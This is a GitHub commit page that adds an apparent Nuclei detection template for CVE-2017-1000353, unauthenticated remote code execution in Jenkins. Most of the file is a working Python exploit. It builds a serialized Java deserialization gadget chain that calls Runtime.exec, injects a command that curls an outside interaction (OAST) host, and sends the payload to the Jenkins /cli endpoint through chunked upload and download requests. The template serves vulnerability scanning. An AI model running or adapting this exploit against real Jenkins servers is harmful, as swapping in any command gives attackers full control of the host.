-
Notifications
You must be signed in to change notification settings - Fork 2.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Jenkins Unauthenticated Remote Code Execution
- Loading branch information
Showing
1 changed file
with
85 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,85 @@ | ||
| id: CVE-2017-1000353 | ||
|
|
||
| info: | ||
| name: Jenkins Unauthenticated Remote Code Execution | ||
| author: hnd3884 | ||
| severity: Critical | ||
| description: | | ||
| Jenkins versions 2.56 and earlier, as well as 2.46.1 LTS and earlier, are vulnerable to an unauthenticated remote code execution. The vulnerability arises from attackers being able to transfer a serialized Java SignedObject object to the Jenkins CLI, which is then deserialized using a new ObjectInputStream. This deserialization bypasses the existing blacklist-based protection mechanism. | ||
| variables: | ||
| OAST: "{{interactsh-url}}" | ||
| ROOTURL: "{{RootURL}}" | ||
|
|
||
| code: | ||
| - engine: | ||
| - py | ||
| - python3 | ||
| source: | | ||
| import requests | ||
| import uuid | ||
| import threading | ||
| import time | ||
| import os | ||
| import struct | ||
| CMD = 'curl https://' + os.getenv('OAST') | ||
| URL = '%s/cli' % os.getenv('ROOTURL').rstrip('/') | ||
| PREAMLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' | ||
| PROTO = b'\x00\x00\x00\x00' | ||
| def java_string(s): | ||
| length = len(s) | ||
| packed_length = struct.pack(">H", length) | ||
| return packed_length + s.encode() | ||
| def download(url, session): | ||
| headers = {'Side' : 'download'} | ||
| headers['Content-type'] = 'application/x-www-form-urlencoded' | ||
| headers['Session'] = session | ||
| headers['Transfer-Encoding'] = 'chunked' | ||
| r = requests.post(url, data=b' ', headers=headers, stream=True, verify=False) | ||
| print(r.content) | ||
| def upload(url, session, data): | ||
| headers = {'Side' : 'upload'} | ||
| headers['Session'] = session | ||
| headers['Content-type'] = 'application/octet-stream' | ||
| headers['Accept-Encoding'] = None | ||
| r = requests.post(url,data=data,headers=headers, verify=False) | ||
| def upload_chunked(url,session): | ||
| headers = {'Side' : 'upload'} | ||
| headers['Session'] = session | ||
| headers['Content-type'] = 'application/octet-stream' | ||
| headers['Accept-Encoding']= None | ||
| headers['Transfer-Encoding'] = 'chunked' | ||
| headers['Cache-Control'] = 'no-cache' | ||
| r = requests.post(url, headers=headers, data=create_payload_chunked(), verify=False) | ||
| print(r.content.hex()) | ||
| def create_payload_chunked(): | ||
| yield PREAMLE | ||
| yield PROTO | ||
| yield create_payload(CMD) | ||
| def create_payload(cmd): | ||
| serialized = "aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e63757272656e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537472696e673b7870757200025b42acf317f8060854e002000078700000050baced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001740012746f756368202f746d702f686f616e676e64740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878787571007e00110000002f302d021439e722dbd82414a747c2de0e7d831a1264e0ab5902150084604637b41649a8ba9799fe2cc0590574cf970e740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000017704000000017400046173646678787371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078".replace("0012746f756368202f746d702f686f616e676e64",java_string(cmd).hex()).replace('050baced000573', struct.pack(">H", 1291 + len(cmd)-18).hex() + 'aced000573') | ||
| return bytes.fromhex(serialized) | ||
| def main(): | ||
| session = str(uuid.uuid4()) | ||
| t = threading.Thread(target=download, args=(URL, session)) | ||
| t.start() | ||
| time.sleep(2) | ||
| upload_chunked(URL, session) | ||
| main() | ||
| matchers: | ||
| - type: dsl | ||
| dsl: | ||
| - 'contains(interactsh_protocol, "dns")' | ||
| condition: and | ||
| # digest: 4a0a0047304502203c5c6db23c3a60c31ee1a45fec997ebe91b0f965532d3c084e85671dd0025d88022100c9af8649d847d1cd74649da34d7afbd8c0d19b14a313c5a3c76f4bebb42e4f7e:76a15c34e1883a81d3a95424e8103c78 |